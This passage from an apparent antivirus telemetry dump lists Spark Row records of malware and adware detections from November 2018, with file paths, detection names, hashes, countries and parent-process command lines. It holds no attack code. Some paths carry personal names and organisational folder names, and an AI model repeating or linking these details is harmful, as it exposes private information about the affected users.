  Row(detection=Row(filename='smartbar.communication.dll', filepath='g:\\program files\\lpt\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='f3bddeb44cd22f046cc90170314cc32cef997b98375d64aab286fcffe97f8feb', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-152322-0f7a5bc3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10b881be\\AVSCAN-20181102-152308-0CAD17B5\\AVSCAN-20181102-152322-0F7A5BC3', filesize=64000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='b97aa27eb3dd4abce9535c6fa5f5c41cce6fe14a47ad2d4fc3f653305fae10dd', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T14:23:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='deletedoctor.exe', filepath='F:\\HBCD\\Programs\\DeleteDoctor.exe', filesize=64000, name='BDS/Rogue.766002.#M1.#R1'), hash='c52dabe8d138d077358065c61a91b37e1ec4311e69e5b26e8f950f5d25c0c474', metadata=Row(cmdline='x \\\\\\"D:\\\\\\\\JOB\\\\\\\\Keluarga Operasi Sistem\\\\\\\\Hiren + Rufus\\\\\\\\12.Hiren.s.Boot.CD.15.2.iso\\\\\\" -o\\\\\\"F:\\\\\\\\\\\\\\" -y -x![BOOT]*', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\nsh6360.tmp\\7zG.exe', parentsize=227840, timestamp='2018-11-02T08:10:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cars.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\CARS\\CARS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='ee8c5d41dd28d2d5d3657d29cc611ae890e7e3c6697165cfce6bad98b9fcca08', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135129-47981435', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-134656-27EA83EE\\AVSCAN-20181102-135129-47981435', filesize=128000, name='Adware/AD.Elex.wfnhx.#M1.#R1'), hash='a393a64f854d2cfefb2ce8d2af8cd047993e12258ca24c31ec3e54d6ebcff0f2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:49:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-065602-cad22cac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_14358ac3\\AVSCAN-20181031-234307-8D092D33\\AVSCAN-20181102-065602-CAD22CAC', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:02:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='system volume information.exe', filepath='F:\\System Volume Information\\System Volume Information.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1810432, timestamp='2018-11-02T10:38:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='langpack.exe', filepath='\\\\ts-xelcea\\share\\Acad\\acad2008\\x86\\support\\dotnetfx\\1029\\langpack.exe', filesize=1856000, name='W32/Stanit.#M1.#R1'), hash='ad992d9f3f15a7475cc403f35cbbbb41968f4f6ce965149955a5035d3a90d141', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:35:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsk82F4.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-02T07:47:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-200818-dc8d5df2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a683e352\\AVSCAN-20181102-194413-4576C1AE\\AVSCAN-20181102-200818-DC8D5DF2', filesize=128000, name='ADWARE/Adware.Gen7.#M1.#R1'), hash='b33ad7d6f22ca8a8556926cd6bb0e8d8fc9962e540ed2ca3200e75a5735c3c72', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:08:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='oduhxdskahnott.bat', filepath='H:\\oduhxdskahnott.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='a15f43e03a607fafd71d9138639cec715c3d4b21dd96e541261fff308c24f7b0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2613248, timestamp='2018-11-02T08:10:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='анкеты и заявка на 2015 год.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Анкеты и заявка на 2015 год\\Анкеты и заявка на 2015 год.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:52:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0023ec16', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023ec16', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:06:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='9b69fb9ce712f551146ff4092a91399d9b03a0bd', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\9b69fb9ce712f551146ff4092a91399d9b03a0bd', filesize=2304000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='dae2deecbabe2cad5d201d5649610349810d7d6baa1b27da70abce3fa22d6139', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T23:30:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00291b5d', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00291b5d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:58:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fba2075e58fee279ee3132c341f2ba7cb69ef7ce2d4f6c7f1b94eac024f7d1a5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\FBA2075E58FEE279EE3132C341F2BA7CB69EF7CE2D4F6C7F1B94EAC024F7D1A5', filesize=680000, name='TR/Dropper.Gen.#M300.#R246'), hash='fba2075e58fee279ee3132c341f2ba7cb69ef7ce2d4f6c7f1b94eac024f7d1a5', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:07:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='f699d02090acce4fdbee30279a93642e5a51ca81a408abf8a6293e63ac13b5dc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F699D02090ACCE4FDBEE30279A93642E5A51CA81A408ABF8A6293E63AC13B5DC', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='f699d02090acce4fdbee30279a93642e5a51ca81a408abf8a6293e63ac13b5dc', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:51:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00295d2b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00295d2b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T06:11:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150034-8dfe5f2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-142814-1A56BA64\\AVSCAN-20181104-150034-8DFE5F2F', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:00:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl121.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl121.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023a33d', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023a33d', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:55:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='2b1cbb358b96971b91ba31271f3b8474c336160d', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\2b1cbb358b96971b91ba31271f3b8474c336160d', filesize=2112000, name='HEUR/AGEN.1027091.#M1.#R1'), hash='ecb42e734b7897abde09fa4036fa425eecb3e972282db06123abe26741275ccd', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T16:15:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-115136-31a6b8f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b237c868\\AVSCAN-20181104-114819-1D269D51\\AVSCAN-20181104-115136-31A6B8F3', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline=None, country='RE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T07:51:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='pegawai.exe', filepath='F:\\Database\\Prog_LPD\\Exeprog\\Pegawai.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='f5e99d82cea3ca9d52de67cbfbe64960037455586f411c2845116ff1f0893dbf', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=23784, timestamp='2018-11-04T08:27:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-083127-7ffd2ca9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c3181048\\AVSCAN-20181104-083023-74D4EE5E\\AVSCAN-20181104-083127-7FFD2CA9', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='e3e9856fceaf2e00244e8dea7ca6ec30b76af573e21cd489c56aee73f5ca45d5', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:31:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-205900-729c5b5d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3ddb9b33\\AVSCAN-20181104-205414-51610D3E\\AVSCAN-20181104-205900-729C5B5D', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:59:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00252a21', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252a21', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:50:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00252636', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00252636', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:45:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gwpg_cfg_gen.exe', filepath='C:\\Outils\\SPEC\\SPECworkstation\\gwpg_cfg_gen.exe', filesize=256000, name='HEUR/AGEN.1011424.#M1.#R1'), hash='fde8429696314943c57618161f472977fcddb2edc120d3c903c91ccbdacd079c', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$50EE0,57856,0,C:\\\\\\\\Outils\\\\\\\\SPECworkstation_3\\\\\\\\SPECworkstation_3_Final_4\\\\\\\\SPECworkstation_3.exe\\\\\\" \\\\\\/SPAWNWND=$50F36 \\\\\\/NOTIFYWND=$150924 ', country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-KR91Q.tmp\\SPECworkstation_3.tmp', parentsize=713728, timestamp='2018-11-01T17:36:21Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='avscan-20181103-003312-66a63905', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181103-003137-5848E577\\AVSCAN-20181103-003312-66A63905', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T22:33:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T23:05:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp4159528\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\poweriso-6-7.exe', parentsize=3862600, timestamp='2018-11-02T15:27:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='webapprt-stub.exe', filepath='\\\\nas-2tb\\共用資料夾\\1.暫存業務區\\5.黃佳音\\舊資料\\9.吳伊環\\巫data\\資訊軟體\\mozilla firefox\\webapprt-stub.exe', filesize=128000, name='W32/Stanit.#M1.#R1'), hash='4df0896f082c54030716c989fde1487adfc36b6c72baafa1c766c4fc2ee0773b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:C1hRPhq5PE2zUF3r.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=114408, timestamp='2018-11-02T05:25:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cl-eye-driver-5.3.0.0341-emuline.exe', filepath='D:\\software comp\\CL-Eye-Driver-5.3.0.0341-Emuline.exe', filesize=5480000, name='W32/Sality.AT.#M1.#R1'), hash='51d9e52445907840ad999e0fc33e48a52c5da9f76d7faf501c1b32d02a49d05d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T02:56:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155749-df06bfa6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155749-DF06BFA6', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:57:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-10-10-59.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-28T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T09:16:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103856-ad705d01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d235a1c5\\AVSCAN-20181102-103841-AAE884CC\\AVSCAN-20181102-103856-AD705D01', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:39:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-022553-deb256a8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-022553-DEB256A8', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='67f10537268acdfd45aa577ec35fb4aea6f0880ee2957f243795d1d936079303', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:27:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3831801\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/SL5=\\\\\\"$407CE,19444300,139776,D:\\\\\\\\MaRielapc\\\\\\\\Downloads\\\\\\\\aTube_Catcher.exe\\\\\\" \\\\\\/SPAWNWND=$307DE \\\\\\/NOTIFYWND=$307BE ', country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-RV8RJ.tmp\\aTube_Catcher.tmp', parentsize=1191936, timestamp='2018-11-02T19:54:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='57f90f2381f560685af89eabc0d76010a61d896b61bd5f7b5bd0e6c2df619e02', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\57F90F2381F560685AF89EABC0D76010A61D896B61BD5F7B5BD0E6C2DF619E02', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='57f90f2381f560685af89eabc0d76010a61d896b61bd5f7b5bd0e6c2df619e02', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:43:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ags 12.exe', filepath='D:\\DOKUMENKU\\GABUNG NOM TABUNGAN\\2012\\TAB AGS 12\\AGS 12.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe14_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe14 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:47:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rdrleakdiag.exe', filepath='C:\\Windows\\System32\\rdrleakdiag.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='6e56425e6d2d388d182bb3ab6e401bcfd3f3d381ad9215e100a696097a243401', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:56:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jun 12.exe', filepath='D:\\DOKUMENKU\\GABUNG NOM TABUNGAN\\2012\\TAB JUN 12\\JUN 12.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:26:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.vir', filepath='C:\\Applications\\Service.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='MA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\csrss.exe', parentsize=None, timestamp='2018-11-02T07:27:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122715-ebfc2e45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1c258596\\AVSCAN-20181102-122600-DEF2E376\\AVSCAN-20181102-122715-EBFC2E45', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:28:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='htmlwriter.scr', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\samples\\plugins\\htmlwriter\\htmlwriter.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:43Z'), dt=datetime.date(2018, 11, 2)),
